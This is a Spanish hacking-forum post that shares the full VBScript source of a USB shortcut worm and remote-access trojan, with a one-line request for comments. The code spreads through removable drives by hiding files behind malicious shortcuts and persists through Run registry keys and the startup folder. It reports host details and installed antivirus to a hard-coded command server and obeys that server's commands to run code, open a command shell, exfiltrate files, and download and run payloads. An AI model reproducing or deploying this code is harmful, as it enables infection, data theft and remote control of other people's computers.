elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  virus de accesos directos (SOURCE CODE) .
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: virus de accesos directos (SOURCE CODE) .  (Leído 4,289 veces)
**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
virus de accesos directos (SOURCE CODE) .
« en: 24 Septiembre 2017, 04:20 am »

hola a todo les traigo el virus de accesos directos (newphototaday) o tambien conocido como drive.bat ya que virus genera en los usb un batch con ese nombre.

el virus es un vbs.  en pendrives se encuentra con formato wsf por que esta cifrado.

virus vbs:

Código
  1. '<[ recoder : houdini (c) skype : houdini-fx ]>
  2.  
  3. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4.  
  5. host = "update-flash.servehttp.com"
  6. port = 666
  7. installdir = "%temp%"
  8. lnkfile = true
  9. lnkfolder = true
  10.  
  11. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  12.  
  13. dim shellobj
  14. set shellobj = wscript.createobject("wscript.shell")
  15. dim filesystemobj
  16. set filesystemobj = createobject("scripting.filesystemobject")
  17. dim httpobj
  18. set httpobj = createobject("msxml2.xmlhttp")
  19.  
  20.  
  21. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  22.  
  23. installname = wscript.scriptname
  24. startup = shellobj.specialfolders ("startup") & "\"
  25. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  26. if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  27. spliter = "<" & "|" & ">"
  28. sleep = 5000
  29. dim response
  30. dim cmd
  31. dim param
  32. info = ""
  33. usbspreading = ""
  34. startdate = ""
  35. dim oneonce
  36.  
  37. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  38. on error resume next
  39.  
  40.  
  41. instance
  42. while true
  43.  
  44. install
  45.  
  46. response = ""
  47. response = post ("is-ready","")
  48. cmd = split (response,spliter)
  49. select case cmd (0)
  50. case "excecute"
  51.      param = cmd (1)
  52.      execute param
  53. case "update"
  54.      param = cmd (1)
  55.      oneonce.close
  56.      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
  57.      oneonce.write param
  58.      oneonce.close
  59.      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  60.      wscript.quit
  61. case "uninstall"
  62.      uninstall
  63. case "send"
  64.      download cmd (1),cmd (2)
  65. case "site-send"
  66.      sitedownloader cmd (1),cmd (2)
  67. case "recv"
  68.      param = cmd (1)
  69.      upload (param)
  70. case  "enum-driver"
  71.      post "is-enum-driver",enumdriver  
  72. case  "enum-faf"
  73.      param = cmd (1)
  74.      post "is-enum-faf",enumfaf (param)
  75. case  "enum-process"
  76.      post "is-enum-process",enumprocess  
  77. case  "cmd-shell"
  78.      param = cmd (1)
  79.      post "is-cmd-shell",cmdshell (param)  
  80. case  "delete"
  81.      param = cmd (1)
  82.      deletefaf (param)
  83. case  "exit-process"
  84.      param = cmd (1)
  85.      exitprocess (param)
  86. case  "sleep"
  87.      param = cmd (1)
  88.      sleep = eval (param)        
  89. end select
  90.  
  91. wscript.sleep sleep
  92.  
  93. wend
  94.  
  95.  
  96. sub install
  97. on error resume next
  98. dim lnkobj
  99. dim filename
  100. dim foldername
  101. dim fileicon
  102. dim foldericon
  103.  
  104. upstart
  105. for each drive in filesystemobj.drives
  106.  
  107. if  drive.isready = true then
  108. if  drive.freespace  > 0 then
  109. if  drive.drivetype  = 1 then
  110.    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  111.    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
  112.        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
  113.    end if
  114.    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  115.        if not lnkfile then exit for
  116.        if  instr (file.name,".") then
  117.            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  118.                file.attributes = 2+4
  119.                if  ucase (file.name) <> ucase (installname) then
  120.                    filename = split(file.name,".")
  121.                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk")
  122.                    lnkobj.windowstyle = 7
  123.                    lnkobj.targetpath = "cmd.exe"
  124.                    lnkobj.workingdirectory = ""
  125.                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  126.                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  127.                    if  instr (fileicon,",") = 0 then
  128.                        lnkobj.iconlocation = file.path
  129.                    else
  130.                        lnkobj.iconlocation = fileicon
  131.                    end if
  132.                    lnkobj.save()
  133.                end if
  134.            end if
  135.        end if
  136.    next
  137.    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  138.        if not lnkfolder then exit for
  139.        folder.attributes = 2+4
  140.        foldername = folder.name
  141.        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk")
  142.        lnkobj.windowstyle = 7
  143.        lnkobj.targetpath = "cmd.exe"
  144.        lnkobj.workingdirectory = ""
  145.        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  146.        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  147.        if  instr (foldericon,",") = 0 then
  148.            lnkobj.iconlocation = folder.path
  149.        else
  150.            lnkobj.iconlocation = foldericon
  151.        end if
  152.        lnkobj.save()
  153.    next
  154. end If
  155. end If
  156. end if
  157. next
  158. err.clear
  159. end sub
  160.  
  161. sub uninstall
  162. on error resume next
  163. dim filename
  164. dim foldername
  165.  
  166. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  167. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  168. filesystemobj.deletefile startup & installname ,true
  169. filesystemobj.deletefile wscript.scriptfullname ,true
  170.  
  171. for  each drive in filesystemobj.drives
  172. if  drive.isready = true then
  173. if  drive.freespace  > 0 then
  174. if  drive.drivetype  = 1 then
  175.    for  each file in filesystemobj.getfolder ( drive.path & "\").files
  176.         on error resume next
  177.         if  instr (file.name,".") then
  178.             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  179.                 file.attributes = 0
  180.                 if  ucase (file.name) <> ucase (installname) then
  181.                     filename = split(file.name,".")
  182.                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  183.                 else
  184.                     filesystemobj.deletefile (drive.path & "\" & file.name)
  185.                 end If
  186.             else
  187.                 filesystemobj.deletefile (file.path)
  188.             end if
  189.         end if
  190.     next
  191.     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  192.         folder.attributes = 0
  193.     next
  194. end if
  195. end if
  196. end if
  197. next
  198. wscript.quit
  199. end sub
  200.  
  201. function post (cmd ,param)
  202.  
  203. post = param
  204. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  205. httpobj.setrequestheader "user-agent:",information
  206. httpobj.send param
  207. post = httpobj.responsetext
  208. end function
  209.  
  210. function information
  211. on error resume next
  212. if  inf = "" then
  213.    inf = hwid & spliter
  214.    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter
  215.    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter
  216.  
  217.    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  218.    set os = root.execquery ("select * from win32_operatingsystem")
  219.    for each osinfo in os
  220.       inf = inf & osinfo.caption & spliter  
  221.       exit for
  222.    next
  223.    inf = inf & "plus" & spliter
  224.    inf = inf & security & spliter
  225.    inf = inf & usbspreading
  226.    information = inf  
  227. else
  228.    information = inf
  229. end if
  230. end function
  231.  
  232.  
  233. sub upstart ()
  234. on error resume Next
  235.  
  236. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  237. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  238. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  239. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  240.  
  241. end sub
  242.  
  243.  
  244. function hwid
  245. on error resume next
  246.  
  247. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  248. set disks = root.execquery ("select * from win32_logicaldisk")
  249. for each disk in disks
  250.    if  disk.volumeserialnumber <> "" then
  251.        hwid = disk.volumeserialnumber
  252.        exit for
  253.    end if
  254. next
  255. end function
  256.  
  257.  
  258. function security
  259. on error resume next
  260.  
  261. security = ""
  262.  
  263. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  264. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  265. for each objitem in colitems
  266.    versionstr = split (objitem.version,".")
  267. next
  268. versionstr = split (colitems.version,".")
  269. osversion = versionstr (0) & "."
  270. for  x = 1 to ubound (versionstr)
  271. osversion = osversion &  versionstr (i)
  272. next
  273. osversion = eval (osversion)
  274. if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  275.  
  276. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  277. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  278.  
  279. for each objantivirus in colantivirus
  280.    security  = security  & objantivirus.displayname & " ."
  281. next
  282. if security  = "" then security  = "nan-av"
  283. end function
  284.  
  285.  
  286. function instance
  287. on error resume next
  288.  
  289. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  290. if usbspreading = "" then
  291.   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
  292.      usbspreading = "true - " & date
  293.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  294.   else
  295.      usbspreading = "false - " & date
  296.      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
  297.  
  298.   end if
  299. end If
  300.  
  301.  
  302.  
  303. upstart
  304. set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
  305. set installfullnameshort =  filesystemobj.getfile (installdir & installname)
  306. if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  307.    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  308.    wscript.quit
  309. end If
  310. err.clear
  311. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  312. if  err.number > 0 then wscript.quit
  313. end function
  314.  
  315.  
  316. sub sitedownloader (fileurl,filename)
  317.  
  318. strlink = fileurl
  319. strsaveto = installdir & filename
  320. set objhttpdownload = createobject("msxml2.xmlhttp" )
  321. objhttpdownload.open "get", strlink, false
  322. objhttpdownload.send
  323.  
  324. set objfsodownload = createobject ("scripting.filesystemobject")
  325. if  objfsodownload.fileexists (strsaveto) then
  326.    objfsodownload.deletefile (strsaveto)
  327. end if
  328.  
  329. if objhttpdownload.status = 200 then
  330.   dim  objstreamdownload
  331.   set  objstreamdownload = createobject("adodb.stream")
  332.   with objstreamdownload
  333. .type = 1
  334. .open
  335. .write objhttpdownload.responsebody
  336. .savetofile strsaveto
  337. .close
  338.   end with
  339.   set objstreamdownload = nothing
  340. end if
  341. if objfsodownload.fileexists(strsaveto) then
  342.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  343. end if
  344. end sub
  345.  
  346. sub download (fileurl,filedir)
  347.  
  348. if filedir = "" then
  349.   filedir = installdir
  350. end if
  351.  
  352. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  353. set objhttpdownload = createobject("msxml2.xmlhttp")
  354. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  355. objhttpdownload.send ""
  356.  
  357. set objfsodownload = createobject ("scripting.filesystemobject")
  358. if  objfsodownload.fileexists (strsaveto) then
  359.    objfsodownload.deletefile (strsaveto)
  360. end if
  361. if  objhttpdownload.status = 200 then
  362.    dim  objstreamdownload
  363. set  objstreamdownload = createobject("adodb.stream")
  364.    with objstreamdownload
  365. .type = 1
  366. .open
  367. .write objhttpdownload.responsebody
  368. .savetofile strsaveto
  369. .close
  370. end with
  371.    set objstreamdownload  = nothing
  372. end if
  373. if objfsodownload.fileexists(strsaveto) then
  374.   shellobj.run objfsodownload.getfile (strsaveto).shortpath
  375. end if
  376. end sub
  377.  
  378.  
  379. function upload (fileurl)
  380.  
  381. dim  httpobj,objstreamuploade,buffer
  382. set  objstreamuploade = createobject("adodb.stream")
  383. with objstreamuploade
  384.     .type = 1
  385.     .open
  386. .loadfromfile fileurl
  387. buffer = .read
  388. .close
  389. end with
  390. set objstreamdownload = nothing
  391. set httpobj = createobject("msxml2.xmlhttp")
  392. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  393. httpobj.send buffer
  394. end function
  395.  
  396.  
  397. function enumdriver ()
  398.  
  399. for  each drive in filesystemobj.drives
  400. if   drive.isready = true then
  401.     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  402. end if
  403. next
  404. end Function
  405.  
  406. function enumfaf (enumdir)
  407.  
  408. enumfaf = enumdir & spliter
  409. for  each folder in filesystemobj.getfolder (enumdir).subfolders
  410.     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  411. next
  412.  
  413. for  each file in filesystemobj.getfolder (enumdir).files
  414.     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter
  415.  
  416. next
  417. end function
  418.  
  419.  
  420. function enumprocess ()
  421.  
  422. on error resume next
  423.  
  424. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  425. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  426.  
  427. dim objitem
  428. for each objitem in colitems
  429. enumprocess = enumprocess & objitem.name & "|"
  430. enumprocess = enumprocess & objitem.processid & "|"
  431.    enumprocess = enumprocess & objitem.executablepath & spliter
  432. next
  433. end function
  434.  
  435. sub exitprocess (pid)
  436. on error resume next
  437.  
  438. shellobj.run "taskkill /F /T /PID " & pid,7,true
  439. end sub
  440.  
  441. sub deletefaf (url)
  442. on error resume next
  443.  
  444. filesystemobj.deletefile url
  445. filesystemobj.deletefolder url
  446.  
  447. end sub
  448.  
  449. function cmdshell (cmd)
  450.  
  451. dim httpobj,oexec,readallfromany
  452.  
  453. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  454. if not oexec.stdout.atendofstream then
  455.   readallfromany = oexec.stdout.readall
  456. elseif not oexec.stderr.atendofstream then
  457.   readallfromany = oexec.stderr.readall
  458. else
  459.   readallfromany = ""
  460. end if
  461.  
  462. cmdshell = readallfromany
  463. end function

                                                                             Comenten.
En línea



Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines